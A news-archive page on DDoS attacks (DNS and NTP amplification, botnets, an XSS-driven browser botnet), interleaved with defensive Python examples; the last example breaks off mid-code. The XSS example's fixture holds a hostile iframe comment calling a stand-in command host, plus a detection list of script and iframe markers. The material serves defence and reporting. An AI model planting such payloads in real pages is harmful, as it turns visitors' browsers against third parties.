Tag Archives: ddos

Attackers use reflection techniques for larger DDoS attacks

Akamai announced a new global DDoS attack report, which shows that in Q1, DDoS attackers relied less upon traditional botnet infection in favor of reflection and amplification techniques. “Instea…

There is no place like home gateway for DDoS attackers

Home gateway routers are being targeted by cybercriminals launching denial-of-service attacks. They are standard pieces of kit, without which no home or small office can connect to the internet. And millions of them harbour a security vulnerability that threatens to do untold damage to the workings of the web.

Welcome to the humble home gateway – the little routers sitting on our desks are being inducted into battle by criminals launching denial-of-service (DoS) attacks to bring down websites and hold organisations to ransom. A subtle flaw in some home gateways (they act as ‘open DNS proxies’) allows attackers to use them for ‘amplification’, where very small DNS queries (50 bytes) generate very large DNS answers (4,000 bytes). Attackers employ another simple trick – IP address spoofing – to disguise their own identity and cover their tracks while directing waves of traffic to any target they choose, anywhere on the internet.

An amplification attack can create and send a target trillions of bytes of unwanted data over a few hours. The attack on Spamhaus in 2013 generated traffic measured at an enormous 300Gb/s. Many web resources aren’t equipped to deal with such large volumes of traffic and either become unavailable, or slow down to the point where visitors notice. There is also considerable collateral damage to the infrastructure over which these attacks are launched.

These attacks are effective because the amplification effect makes the results wildly disproportionate to the effort needed to launch them. Moreover, home gateways acting as DNS proxies make queries appear legitimate to DNS resolvers and mask the ultimate targets of attacks. As such, they are becoming the weapon of choice for those who aim to damage or hold to ransom any target they wish with impunity. Nor is there any shortage of opportunity for these criminals. Research has found there are 24 million home gateways (home routers) that can be used for amplification attacks. These exploitable routers exist across the globe; it is not a problem limited to developing nations. For online criminals, there really is no place like ‘home’ from which to launch an attack.

One of the systems most impacted by DNS amplification attacks is ISP resolvers. The fact that they are typically provisioned with ample network bandwidth and deployed on high-performance hardware, to ensure they are always responsive and highly available, makes them ideal for attackers, who can piggyback on someone else’s high-performance infrastructure. ISPs get drawn directly into the mire when open DNS proxies on home routers forward queries received on their WAN interface to whatever DNS resolver they are configured to use. In most cases this is an ISP’s resolver (consumers may also configure alternative DNS services from Google and others), and even those who go to great lengths to protect their infrastructure can become collateral damage in the path of an attack.

Bandwidth taken up by DDoS traffic causes networks to suffer from congestion and lowered performance. If quality of service falls noticeably, customers will vote with their feet and walk away to another service provider. And the ultimate recipients of the traffic, the targets themselves, often legitimately enquire about what ISPs have done to limit the effects of attacks. Since this vulnerability provides enormously rich pickings for criminals at little cost, fixing it should be a priority for ISPs.

As with any type of online threat, denial-of-service attacks are protean in nature; they evolve and adapt to circumvent attempts to prevent them. Unfortunately, existing perimeter defences are useless against this new generation of attacks because they’re designed to deter DDoS traffic coming into a provider network instead of traffic going out.

What’s called for is the application of DNS-based security intelligence techniques; by incorporating DNS-level security tools, organisations and ISPs can effectively counter amplification attacks. Deterrence starts with monitoring DNS query data as it is generated, so suspicious activity on the network can be identified quickly. Something else that’s needed is dynamic threat lists that track special purpose-built DNS domains designed and deployed specifically for these kinds of attacks. To eliminate false positives, it’s also crucial that these lists are carefully vetted. Servers should be configured with highly targeted filters to manage malicious traffic, while ensuring legitimate traffic is not affected. Additional rate limits based on response size can catch malicious traffic not caught by other filters. And, following best practice, DNS data logging is also useful for forensics and reporting.

DNS-based security can be used by network operators in a layered security approach. The insidiousness of malware threats requires a defence-in-depth strategy based on various layers of firewalls, packet filters, anti-virus software, intrusion detection and prevention, and many more. Owing to its strategic place in the network, DNS-based security must be added to this portfolio of protection: observing, as it does, every Internet communication, it serves as a lightweight but powerful tool in the armoury.

For far too long, people have unknowingly been hosting a serious security weakness in their houses and in their offices. With DNS-level security we can finally plug this breach, and turn the home once more into a castle.

Source: http://www.information-age.com/technology/security/123457905/there-no-place-home-gateway-ddos-attackers
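The amplification arithmetic and the response-size rate limiting described above, as an added example that is not code from the Information Age article or from any vendor's product. It parses a constructed resolver log, computes the response-bytes-to-query-bytes ratio per source address (which, because the source is spoofed, identifies who is being attacked through the resolver rather than who is attacking), and applies a per-source budget of response bytes per second. Once the budget is exhausted, the reply goes out truncated (TC bit set) rather than dropped, so a genuine client retries over TCP, where the source address cannot be spoofed, while a spoofed UDP source gets only a tiny reply. The log format, addresses and thresholds are assumptions for this demonstration.

```python
"""Spot DNS amplification abuse in resolver logs and cap response
bytes per source.  Added example; the log format, addresses and
thresholds below are constructed for this demonstration."""
from collections import defaultdict
from datetime import datetime, timezone

# Constructed log excerpt: timestamp, source IP, name, type,
# query bytes on the wire, response bytes on the wire.
SAMPLE_LOG = """\
2014-03-01T10:00:00Z 203.0.113.10 example.net ANY 52 3850
2014-03-01T10:00:00Z 203.0.113.10 example.net ANY 52 3850
2014-03-01T10:00:00Z 203.0.113.10 example.net ANY 52 3850
2014-03-01T10:00:01Z 203.0.113.10 example.net ANY 52 3850
2014-03-01T10:00:01Z 203.0.113.10 example.net ANY 52 3850
2014-03-01T10:00:01Z 203.0.113.10 example.net ANY 52 3850
2014-03-01T10:00:00Z 198.51.100.5 www.example.org A 45 120
2014-03-01T10:00:00Z 198.51.100.5 mail.example.org MX 47 230
2014-03-01T10:00:02Z 198.51.100.5 example.org TXT 43 410
2014-03-01T10:00:02Z 192.0.2.7 example.net ANY 52 3850
"""


def parse_line(line):
    """Split one log line into a record with typed fields."""
    ts, src, name, qtype, qlen, rlen = line.split()
    when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return {"ts": when, "src": src, "name": name, "qtype": qtype,
            "qlen": int(qlen), "rlen": int(rlen)}


def parse_log(text):
    return [parse_line(line) for line in text.splitlines() if line.strip()]


def amplification_by_source(records):
    """Per source: query count, bytes in, bytes out, and the
    amplification ratio (bytes out / bytes in)."""
    stats = defaultdict(lambda: {"queries": 0, "qbytes": 0, "rbytes": 0})
    for r in records:
        s = stats[r["src"]]
        s["queries"] += 1
        s["qbytes"] += r["qlen"]
        s["rbytes"] += r["rlen"]
    for s in stats.values():
        s["ratio"] = s["rbytes"] / s["qbytes"]
    return dict(stats)


def suspicious_sources(records, ratio_threshold=20.0, min_queries=5):
    """Sources that pull back far more bytes than they send.  The source
    address is the spoofed victim, so this lists who is being attacked
    through this resolver, not who is attacking."""
    stats = amplification_by_source(records)
    return sorted(src for src, s in stats.items()
                  if s["queries"] >= min_queries and s["ratio"] >= ratio_threshold)


class ResponseByteBudget:
    """Fixed one-second window of response bytes allowed per source.
    A response that would exceed the window's budget is sent truncated
    (TC=1) instead of dropped: a real client retries over TCP, while a
    spoofed UDP source receives only a tiny reply."""

    def __init__(self, bytes_per_second=8000):
        self.limit = bytes_per_second
        self.used = {}  # src -> (window second, bytes used in it)

    def decide(self, src, ts, rlen):
        window = int(ts.timestamp())
        started, used = self.used.get(src, (window, 0))
        if started != window:          # new second, budget resets
            used = 0
        if used + rlen > self.limit:
            self.used[src] = (window, used)
            return "truncate"
        self.used[src] = (window, used + rlen)
        return "answer"


def simulate(records, budget=None):
    """Replay the log through the budget; count decisions per source."""
    budget = budget or ResponseByteBudget()
    outcome = defaultdict(lambda: {"answer": 0, "truncate": 0})
    for r in sorted(records, key=lambda r: r["ts"]):
        outcome[r["src"]][budget.decide(r["src"], r["ts"], r["rlen"])] += 1
    return {src: dict(counts) for src, counts in outcome.items()}


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    for src, s in amplification_by_source(recs).items():
        print(f"{src:14} queries={s['queries']:2} ratio={s['ratio']:.1f}")
    print("suspicious:", suspicious_sources(recs))
    print("budget decisions:", simulate(recs))
```

On the constructed log, 203.0.113.10 receives 74 bytes back for every byte it sends and is the only address flagged; the budget answers two of its three large replies per second and truncates the third, while the ordinary client is never touched. Production resolvers implement the same idea natively (BIND's Response Rate Limiting, for instance), keyed on the response rather than the query because the query side carries the spoofed address.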

Bot masters in cut-throat DDoS fight

DDoS reaches 300,000 connections a minute. Botnet operators in the criminal underground are launching large denial-of-service attacks against each other in a bid to knock out rivals in the race to compromise computers.

Security researchers have discovered that command and control servers owned by operators of Zeus botnets were blasted by those running a rival Cutwail botnet in a distributed denial-of-service attack reaching 300,000 connections a minute.

The infamous Zeus malware was a trojan often used to steal banking information and install cryptolocking software. The Zeus family was considered to be the largest botnet operating on the internet. Cutwail is also an established botnet, typically involved in sending spam via the Pushdo trojan and at its peak pushing out millions of emails a day. University researchers said in a paper that Cutwail, known to spammers as ‘0bulk Psyche Evolution’, was rented to spam affiliates who pay fees to the botmasters totalling hundreds of thousands of dollars in order to launch spam campaigns (pdf).

RSA researchers found a hit list of new dynamically generated domain names within a Cutwail botnet which served as infrastructure targets of the operator’s rivals. A senior threat researcher who runs under the handle ‘Fielder’ wrote that he was surprised to find evidence of the continual fighting. “This is an incredibly interesting finding as it suggests some fierce competition within the criminal underground,” Fielder said. “This was quite literally a live action view of botmasters attacking one another.”

The research team examined the attacked IP addresses and found that each was related to Zeus and Zbot (Zeus) command and control hosts. The attacker’s IP addresses were tracked since August and linked to Zeus and Kryptik trojans and variants, as well as Bitcoin mining activity. These addresses were also embroiled in a “long history” of malware campaigns, including those foisting the formerly infamous BlackHole exploit kit, spam campaigns and an effort to serve malware over IRC and BitTorrent.

Source: http://www.itnews.com.au/News/382411,bot-masters-in-cut-throat-ddos-fight.aspx?utm_source=feed&utm_medium=rss&utm_campaign=editors_picks

DDoS attacks: Bigger, Badder and Nastier than last year

DDoS bots are evolving, developing immunity to cookie and JavaScript challenges along the way.

A raft of next-generation DDoS attacks have marked the first months of 2014, says a new report from Incapsula, which notes that large-scale SYN flood attacks now account for a hefty 51.5 percent of all large-scale attacks. The research – which covers the whole of 2013 and the first two months of 2014 – says that 81 percent of DDoS attacks seen in 2014 are now multi-vectored, with almost one in every three attacks now above 20 Gbps in data volume terms.

The analysis – entitled the ‘2013-2014 DDoS Threat Landscape Report’ – says that application (Layer 7) DDoS attacks are becoming a major headache for IT professionals as this year progresses, with DDoS bot traffic up by 240 percent in the three months to the end of February this year. Interestingly, Incapsula says that 29 per cent of botnets have been seen attacking more than 50 targets a month.

The analysis – which is based on 237 network DDoS attacks that exceeded 5 Gbps and targeted Web sites on Incapsula’s network – concludes that DDoS bots are evolving, developing immunity to cookie and JavaScript challenges along the way. In fact, says Incapsula, during the final quarter of 2013 the firm’s research team reported its first encounter with browser-based DDoS bots that were able to bypass both JavaScript and cookie challenges – the two most common methods of bot filtering.

The problem, concludes the report, is that the DDoS attack perpetrators are now looking to raise the stakes even higher by introducing new capabilities, many of which are specifically designed to abuse the weaknesses of traditional anti-DDoS solutions. As a result, in 2014, the research predicts, many IT organisations will need to re-think their security strategies to respond to the latest Layer 3-4 and Layer 7 DDoS threats.

According to Barry Shteiman, Director of Security Strategy with Imperva, the report exposes advancements in both network and application layers. The most interesting take-out from the report, he says, is that application DDoS attacks are now originating in botnets. “Last year we wrote extensively about the trend on CMS hacking for industrialised cybercrime where attackers use botnets in order to turn onboard infected machines into botnets and then use those as platforms for network and application attacks,” he said. “For DDoS attacks, it just makes sense. When a hacker has the power of masses with a large botnet, there are great opportunities to disrupt service. When servers are being infected rather than users’ computers, it’s even worse, just because of the bandwidth and computing power that becomes available to the hacker,” he added.

Ashley Stephenson, CEO of Corero Network Security, said that it is essential that governments take a more active role in encouraging private sector organisations to address the issue of DDoS attacks – and to put in place the appropriate plans to deal with these unavoidable security risks to their business and the nation’s financial infrastructure. “As consumers saw in late 2012 and early 2013, in both the US and UK, banks and financial institutions were successfully targeted by attacks which compromised their online services,” he told SCMagazineUK.com. The Corero CEO went on to say that his company believes that mandated controls – like those recently proposed by the Federal Financial Institutions Examination Council (FFIEC) – will drive organisations to take pro-active steps to regaining control of their online presence. “These mandates, at a minimum, offer guidance for financial institutions for appropriate DDoS activity monitoring and adequate incident response planning; this will ultimately lead to the deployment of more effective DDoS defence solutions,” he explained.

Source: http://www.scmagazineuk.com/ddos-attacks-bigger-badder-and-nastier-than-last-year/article/342078/

DDoS attacks target online gaming

Distributed denial of service (DDoS) attacks are not limited to enterprises; we have recently seen a string of DDoS attacks hitting the gaming industry, says senior engineer at F5 Networks, Martin Walshaw.

“The attacks have become more frequent, particularly in the professional gaming scene where large sums of money are available,” explains Walshaw, adding that this presents a fresh concern for competitive gamers, as the Internet protocol addresses of individual players, as well as servers, are increasingly being targeted.

DDoS attacks are designed to make a service unavailable to its intended users. According to Walshaw, they typically target banking sites and credit card payment gateways, but lately there has been a marked increase in attacks targeting gaming sites.

“InfoSecurity Magazine reports that in February the number of network time protocol (NTP) amplification attacks increased 371.43%. The average peak DDoS attack volume increased a staggering 807.48%, prompting Prolexic Technologies to issue a high alert threat advisory on NTP amplification DDoS attacks – but it was too late for Wurm and League of Legends.”

Walshaw cites a recent article on BBC News, which revealed that Wurm is among the latest games to have been hit, with an attack knocking the multiplayer servers offline for two days between 18 and 20 February. For the developer, this is a major inconvenience, he says, as the main selling point of the game is its multiplayer content – the more prolonged the attack, the more damage it does to the brand.

“For most gamers, these attacks are frustrating and inconvenient. Wurm’s creators were forced to migrate to new servers and offered a bounty of €10 000 for information that would lead to the perpetrator/s. Also in February, the League of Legends site suffered two DDoS attacks in 24 hours, described as the ‘biggest [attack] of its kind’ against the game since its inception.”

However, notes Walshaw, in electronic sports competitions, which offer professional gamers considerable sums of money in tournaments, DDoS attacks are more than just an inconvenience; they can have a significant impact on the results of a game. Last year, several rounds of a popular DOTA 2 tournament had to be postponed after persistent DDoS attacks in qualifying rounds. In competitions where reactions delayed by a fraction of a second can result in failure and lost funds, a slow connection can be a serious issue.

“DDoS attacks are increasingly prevalent and show no signs of losing popularity with cyber criminals. Experts expect these enormous volumetric attacks will gain popularity due to the fact that they leverage existing DNS servers on the Internet – there is no need to recruit one’s own botnet, or even rent one,” he states. “Large cyber-attacks are capable of knocking out business-critical applications that generate revenue and facilitate communications, which can have severe business impacts. Organisations that depend on their online presence for survival absolutely need to invest in security solutions that protect themselves, staff, customers and end-users against these attack vectors.”

According to John Grady, research manager for security products at IDC, DDoS attack methods have become much stealthier and are increasing in frequency, volume and application specificity. To ensure protection against these threats, he urges organisations to consider a defence-in-depth posture for DDoS defence. Grady adds that one important component is the on-premises appliance, key in detecting and mitigating advanced application, SSL and volumetric attacks.

“Whether these kinds of DDoS attacks are the work of mischief makers, sore losers or even attempts to sabotage rivals, is unclear. What is clear is that defending against DDoS attacks is not just the province of private and public sector businesses,” observes Walshaw. He concludes that these attacks have become more prevalent and have amplified over the last year; we can expect to see a lot more of them, with even greater power, across different sectors, throughout this year.

Source: http://www.itweb.co.za/index.php?option=com_content&view=article&id=111708:DDoS-attacks-target-online-gaming&catid=218

How a website flaw turned 22,000 visitors into a botnet of DDoS zombies

Researchers have uncovered a recent denial-of-service attack that employed an unusual, if not unprecedented, technique to surreptitiously cause thousands of everyday Internet users to bombard the target with a massive amount of junk traffic.

The attack worked by exploiting a Web application vulnerability on one of the biggest and most popular video sites on the Web, according to a blog post published recently by researchers at security firm Incapsula, which declined to identify the site by name. Malicious JavaScript embedded inside the image icons of accounts created by the attackers caused anyone viewing the users’ posts to run attack code that instructed their browser to send one Web request per second to the DoS victim. In all, the technique caused 22,000 ordinary Web users to unwittingly flood the target with 20 million GET requests.

“Obviously one request per second is not a lot,” Incapsula researchers Ronen Atias and Ofer Gayer wrote. “However, when dealing with video content of 10, 20, and 30 minutes in length, and with thousands of views every minute, the attack can quickly become very large and extremely dangerous. Knowing this, the offender strategically posted comments on popular videos, effectively created a self-sustaining botnet comprising tens of thousands of hijacked browsers, operated by unsuspecting human visitors who were only there to watch a few funny cat videos.”

The novel attack was made possible by the presence of a persistent cross-site scripting (XSS) vulnerability in the video site, which Incapsula didn’t identify except to say it fell in the Alexa top 50 list. XSS exploits effectively allow attackers to store malicious JavaScript on a website that gets invoked each time someone visits. The booby-trapped user icons contained an iframe tag that pulled malicious instructions off an attacker-controlled command and control server. The malicious instructions caused browsers to surreptitiously flood the DDoS target with an unusually high number of GET requests. Incapsula was able to mitigate the effects of the attack using a combination of progressive challenges and behavior-based security algorithms.

Remember the Samy Worm?

The attack is only the latest to harness the tremendous power of XSS vulnerabilities. The technique came into vogue in 2005 with the advent of the Samy worm. Named after its creator, a hacker named Samy Kamkar, the XSS exploit knocked MySpace out of commission for a day by forcing anyone who viewed his profile to become a MySpace friend. In less than 24 hours, Kamkar, who later served time in jail for the stunt, gained more than one million followers.

“The nature and beauty of persistent XSS is that the attacker doesn’t need to target specific users,” Matt Johansen, senior manager of Whitehat Security’s threat research center, told Ars. “The malicious JavaScript is stored on the website and replayed to anybody who visits this in the future. This particular JavaScript forced each browser that was running it to make a request in one-second intervals.”

Last year, Johansen and other colleagues from Whitehat Security demonstrated a proof-of-concept ad network that created a browser-based botnet using a technique that’s similar to the one Incapsula observed exploiting the XSS weakness. “The delivery mechanism [in the Incapsula-observed attack] was different as it was from persistent XSS in the site instead of an ad network,” Johansen explained. “The only difference there was how the malicious JavaScript was rendered in the user’s (bot’s) browser. The code that is quoted in the [Incapsula] article is using a very similar technique to the code we wrote for our talk. Instead of using (image) tags like we did, this attacker is using tags which then make one request per second. We were just loading as many images as possible in the time our JavaScript was running.”

Incapsula’s discovery comes three months after criminals were observed using another novel technique to drastically amplify the volume of DDoS attacks on online game services and other websites. Rather than directly flooding the targeted services with torrents of data, an attack group sent much smaller data requests to time-synchronization servers running the Network Time Protocol. By manipulating the requests to make them appear as if they originated from one of the gaming sites, the attackers were able to vastly increase the firepower at their disposal. The technique abusing the Network Time Protocol can result in as much as a 58-fold increase or more. Miscreants have long exploited unsecured domain name system servers available online to similarly amplify the amount of junk traffic available in DDoS attacks.

Incapsula’s finding underscores the constantly evolving nature of online attacks. It also demonstrates how a single weakness on one party’s website can have powerful consequences for the Internet at large, even for those who don’t visit or otherwise interact with the buggy application.

Source: http://arstechnica.com/security/2014/04/how-a-website-flaw-turned-22000-visitors-into-a-botnet-of-ddos-zombies/
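The root cause described above is a persistent XSS: stored profile fields (avatar and comment) rendered into every visitor's page without encoding. The following is an added example, not code from the Ars Technica article, Incapsula or the unnamed video site; it renders constructed profile records the vulnerable way and the hardened way side by side. The hardened path validates the avatar URL against an allowlisted host and HTML-escapes every stored value, so markup in a comment is displayed as text instead of parsed. The profile records, the allowlist, the default avatar path and the policy header are assumptions of this demonstration.

```python
"""Stored profile data rendered into a comment widget: the unescaped
'before' form beside the hardened form.  Added example; the records,
host allowlist and markup are constructed for this demonstration."""
import html
from urllib.parse import urlparse

# Constructed stored profiles; 'mallory' is the kind of account the
# article describes: attacker-controlled avatar and comment fields.
PROFILES = {
    "alice": {"avatar_url": "https://cdn.example/avatars/alice.png",
              "comment": "Great video!"},
    "mallory": {"avatar_url": "http://attacker.invalid/tracker.png",
                "comment": '<iframe src="http://attacker.invalid/c2"></iframe>'},
}

# Only the site's own image host may be embedded as an avatar (assumed).
ALLOWED_AVATAR_HOSTS = {"cdn.example"}
DEFAULT_AVATAR = "/static/default-avatar.png"


def render_comment_vulnerable(profile):
    """'Before' form: stored data interpolated straight into markup,
    which is what lets a persistent XSS payload run in every visitor's
    browser."""
    return (f'<div class="comment"><img src="{profile["avatar_url"]}">'
            f'<p>{profile["comment"]}</p></div>')


def safe_avatar_url(url):
    """Accept only https URLs on an allowlisted host; anything else
    falls back to the default avatar."""
    parts = urlparse(url)
    if parts.scheme != "https" or parts.hostname not in ALLOWED_AVATAR_HOSTS:
        return DEFAULT_AVATAR
    return url


def render_comment_hardened(profile):
    """Hardened form: the URL is validated, then every stored value is
    HTML-escaped (quotes included) before it lands in the page, so
    markup in a comment is shown as text rather than parsed."""
    avatar = html.escape(safe_avatar_url(profile["avatar_url"]), quote=True)
    body = html.escape(profile["comment"], quote=True)
    return f'<div class="comment"><img src="{avatar}"><p>{body}</p></div>'


def contains_active_content(markup):
    """Crude check used only to show the difference: does the rendered
    fragment still contain a live frame/script tag or a javascript: URL?"""
    lower = markup.lower()
    return any(marker in lower for marker in ("<iframe", "<script", "javascript:"))


# A response header the site could also send so that even an injection
# the encoder misses cannot load frames or run inline script (constructed
# policy; tailor the source lists to the real site).
CONTENT_SECURITY_POLICY = ("default-src 'self'; script-src 'self'; "
                           "frame-src 'none'; img-src 'self' https://cdn.example")


if __name__ == "__main__":
    for name, profile in PROFILES.items():
        before = render_comment_vulnerable(profile)
        after = render_comment_hardened(profile)
        print(name, "vulnerable active:", contains_active_content(before),
              "| hardened active:", contains_active_content(after))
        print("  ", after)
```

For the ordinary profile both renderers produce identical markup; for the hostile one the vulnerable renderer emits a live iframe and the hardened renderer emits the literal text `&lt;iframe ...&gt;` with a default avatar. Output encoding at the point of rendering is the fix; the Content-Security-Policy header is a second layer that limits the damage if an encoder is ever missed.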

DDoS Attack on Ellie Mae site Suspects Attackers Had Industry Knowledge

The distributed denial-of-service attack that crashed Ellie Mae’s loan origination system was cleverly disguised and could have been carried out by individuals with mortgage industry expertise, the vendor says.

The March 31-April 1 attack overwhelmed the company’s servers with data requests that had the look and feel of legitimate communications. Specifically, the attack flooded the servers with requests to a URL that is used to download an XML file containing a list of third-party technology vendors that integrate with the Encompass LOS via the Ellie Mae Network.

“It was a massive number of requests that came in and consumed the full capacity of one set of our servers around a specific URL,” Ellie Mae President and Chief Operating Officer Jonathan Corr says in his first interview since the attack was disclosed. “Where a classic denial-of-service attack would be a request that comes in that is not valid and would just create a lot of failed attempts, this was a valid request with a normal signature.”

The investigation into the incident is ongoing, but the manner in which the attack was carried out may indicate that it was the work of people familiar with the mortgage industry. “I find it very coincidental that this was using a valid request and a normal signature, which if you look at just a random attack, that’s not typically the case,” Corr says. “And it occurred on the last day of the month and the quarter, starting first thing in the morning” — a critical time for loan closings. “That could be coincidence, I don’t have evidence otherwise, but we find it very disturbing and we’re trying to figure it out. It seems like that could be a possibility,” he adds.

The XML file contains no sensitive data and is accessible through a so-called open request, which doesn’t require the type of authentication needed to access actual loan files in the system. The attack resembled data requests that would come from the smart client application used to access Encompass and the Ellie Mae Network. This similarity initially made the communications difficult to identify as a threat. “Because of the way it came in, it looked just like a request that we would expect and it wasn’t something that someone out there randomly could do,” Corr says. “Somebody obviously understood a basic public request that would come from an Encompass system.”

Ellie Mae has hired Stroz Friedberg, a cyber-security and digital forensics investigation firm, to piece together evidence and trace the attack, evaluate Ellie Mae’s response to the incident, and validate that the vendor did not suffer a data or security breach. “We’re asking them to validate that so we can provide a third-party perspective to our customers so that they can turn around and let their regulators know,” Corr says.

Ellie Mae, based in Pleasanton, Calif., has put protocols in place to defend against an attack of this nature, and Corr says the company will make additional investments “to further harden the walls” of its infrastructure. “We’re really focused on how to get even better at dealing with anybody that might try to affect the livelihood of our customers,” he says.

Source: http://www.americanbanker.com/issues/179_65/ellie-mae-suspects-attackers-had-industry-knowledge-1066689-1.html

24 million reasons to lock down DNS amplification attacks

Research from Nominum, a US security consultancy that supplies ISPs with DNS-based analytics and revenue advice, claims to show that 24 million home and small office broadband routers around the world are vulnerable to being tapped as part of a massive DDoS attack.

Distributed-denial-of-service (DDoS) swarm attacks have been around for years, but hijacking routers is a relatively recent trend, driven largely by the fact that very few users actively update the firmware of their legacy routers. Rather than hack the host computer, Nominum says that the hackers can now manipulate DNS (Domain Name System) traffic lookups – the technology that translates alphabetic domain names (e.g. www.bbc.co.uk) into their numeric identifiers (e.g. 987.65.43.21). By spoofing the target’s IP address and generating a small IP request (ICMP) to a vulnerable router, the router will then generate a larger IP data packet to the real IP address. Nominum claims that this ‘amplification’ effect can be tapped to turn a few megabits of data bandwidth into many tens of gigabits of bandwidth-hogging IP streams.

This is no theoretical analysis, as the consultancy claims to have spotted over 5.3 million home and office routers being hijacked during February to generate IP attack traffic – with as much as 70 per cent of total DNS traffic being attributed to one attack seen during January. Nominum says the effect on ISP traffic is immense, with trillions of bytes of attack data disrupting ISP networks, websites and individuals. In the longer term, the consultancy says there is a network impact generated by malicious traffic saturating the available bandwidth and a consequent loss of revenue as users migrate to other ISPs due to an apparently poor experience.

Sanjay Kapoor, the SVP of strategy with Nominum, said that existing DDoS defences do not work against today’s amplification attacks, which can be launched by any criminal who wants to achieve maximum damage with minimum effort. “Even if ISPs employ best practices to protect their networks, they can still become victims, thanks to the inherent vulnerability in open DNS proxies,” he said.

Peter Wood, CEO of pen-testing specialist First Base Technologies, says that the problem identified by Nominum is often found by his research team where remote branch offices and staff working from home are involved. “We’ve recently been testing a Draytek Vigor router in this regard, and the good news is that most of the attack ports that could be used are turned off by default. Conversely, we also tested a Buffalo router, where the exact reverse was true,” he explained. “This is the joy of OpenDNS proxies. It’s also not that obvious how to configure a fixed IP on many routers,” he said, adding that some clients are – thankfully – becoming more aware of the security risks from the amplification attacks identified by Nominum’s research.

Sven Schlueter, a senior consultant with Context Information Security, said that DNS application attacks mean that only minimal resources are required to conduct an attack against the availability of a larger system or network. “This type of attack is then often performed from different sources, all spoofing the source ‘to origin from the target’, resulting in a DDoS against the available bandwidth of the targeted hosts and networks when content is returned from the legitimate DNS,” he said, adding that a number of mitigation solutions are now possible. “For example, a DNS server administrator can ensure that the resolver is not open to the Internet. Very rarely – usually only for service providers – is a resolver required to be open to the Internet. However, if necessary, rate limiting and monitoring can be applied to slow down, detect and mitigate attacks,” he said. “ISPs can also enforce restrictions so that spoofing of addresses is not possible. Service owners, such as a Web site administrator, can only slightly mitigate the issue by dynamically allocating more bandwidth and filtering the attack at the border/ISP core, to the network affected,” he added.

Jag Bains, CTO of DDoS remediation specialist DOSarrest, said that there is a need for focused DDoS protection services as his firm is seeing more and more attack vectors and agents emerge – something that he says is only going to increase as the ‘Internet of Things’ gains further traction. “Strategic decision makers will need to understand what specific assets need protection and in what specific manner, and ensure they buy the right solution,” he noted.

Lamar Bailey, director of security research with Tripwire, said that home and small office modems, gateways and routers are generally the second weakest link in a home/small office network behind printers. “Internet providers do update or use current technology for home user gateways and the end user is generally stuck with whatever the provider gives them. The routers are generally on very old technology and not easy or possible to secure. DDoS and other attacks are very successful on these old routers,” he said. Bailey went on to say that the ISPs need to take security more seriously and help protect their consumers. “In the US each region has limited options for ISPs which is almost a monopoly. This is bad for consumers and great for attackers and bot herders,” he explained.

Source: http://www.scmagazineuk.com/24-million-reasons-to-lock-down-dns-amplification-attacks/article/341026/

24 million routers expose ISPs to DNS-based DDoS attacks

DNS-based DDoS amplification attacks have significantly increased in the recent months, targeting vulnerable home routers worldwide. A simple attack can create 10s of Gbps of traffic to disrupt provid…

DDoS Trends Report Reveals Spike in Botnet Activity

A new study documenting distributed denial of service (DDoS) trends found an average of more than twelve million unique botnet-driven DDoS attacks occurring weekly in the last 90 days, representing a 240% increase over the same period in 2013.

“Unlike network DDoS attacks, Layer 7 attack sources can’t hide behind spoofed IPs. Instead they resort to using Trojan infected computers, hijacked hosting environments and Internet-connected devices,” the report stated. “Large groups of such compromised resources constitute a botnet; a remotely controlled ‘zombie army’ that can be used for DDoS attacks and other malicious activities.”

Key findings on network (Layer 3 & 4) DDoS attacks included:

- Large SYN floods account for 51.5% of all large-scale attacks
- Almost one in every three attacks is above 20Gbps
- 81% of attacks are multi-vector threats
- The normal SYN flood & large SYN flood combination is the most popular multi-vector attack (75%)
- NTP reflection was the most common large-scale attack method in February 2014

Key findings on application (Layer 7) DDoS attacks included:

- DDoS bot traffic is up by 240%
- More than 25% of all botnets are located in India, China and Iran
- The USA is ranked number 5 in the list of “Top 10” attacking countries
- 29% of botnets attack more than 50 targets a month
- 29.9% of DDoS bots can hold cookies
- 46% of all spoofed user-agents are fake Baidu bots (while 11.7% are fake Googlebots)

“2013 was a game-changing year for DDoS attacks, with higher-than-ever attack volumes and rapid evolution of new attack methods,” the report states. “Now, the perpetrators are looking to raise the stakes even higher by introducing new capabilities, many of which are specifically designed to abuse the weaknesses of traditional anti-DDoS solutions. As a result, in 2014, many IT organizations will need to re-think their security strategies to respond to latest Layer 3-4 and Layer 7 DDoS threats.”

Source: http://www.tripwire.com/state-of-security/top-security-stories/ddos-trends-report-reveals-spike-botnet-activity/
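Two of the Layer 7 findings above (spoofed crawler user-agents, and bots that now pass cookie and JavaScript challenges) point at checks that do not depend on those challenges. The following is an added example, not code from the Tripwire article or the report it summarises: it triages a constructed web access log by (1) verifying a claimed search crawler through reverse DNS followed by a forward lookup of the returned name, which a spoofed user-agent cannot satisfy, and (2) flagging sources whose request timing is too regular to be a person, in the spirit of the behaviour-based detection mentioned in the Incapsula story earlier on this page. The log excerpt, the DNS tables (stand-ins for real `socket.gethostbyaddr`/`gethostbyname` calls so that it runs offline), the thresholds and the crawler domain suffixes are assumptions of this demonstration.

```python
"""Layer 7 bot triage over a web access log: verify claimed search
crawlers through reverse-then-forward DNS, and flag sources whose
request timing is too regular to be a person.  Added example; the log
excerpt, DNS tables and thresholds are constructed, and the crawler
domain suffixes are assumptions of this demonstration."""
import statistics
from collections import defaultdict

# Constructed access-log excerpt, tab separated: epoch seconds, source IP,
# request path, user agent.  203.0.113.44 claims to be Googlebot and hits
# the page once a second; 192.0.2.10 plays the genuine crawler;
# 198.51.100.9 is an ordinary visitor.
GOOGLEBOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
BROWSER_UA = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 Chrome/33.0 Safari/537.36"
ACCESS_LOG = "\n".join([
    f"1396000000.000\t203.0.113.44\t/video/123\t{GOOGLEBOT_UA}",
    f"1396000001.002\t203.0.113.44\t/video/123\t{GOOGLEBOT_UA}",
    f"1396000002.001\t203.0.113.44\t/video/123\t{GOOGLEBOT_UA}",
    f"1396000003.000\t203.0.113.44\t/video/123\t{GOOGLEBOT_UA}",
    f"1396000003.999\t203.0.113.44\t/video/123\t{GOOGLEBOT_UA}",
    f"1396000005.001\t203.0.113.44\t/video/123\t{GOOGLEBOT_UA}",
    f"1396000000.500\t192.0.2.10\t/video/123\t{GOOGLEBOT_UA}",
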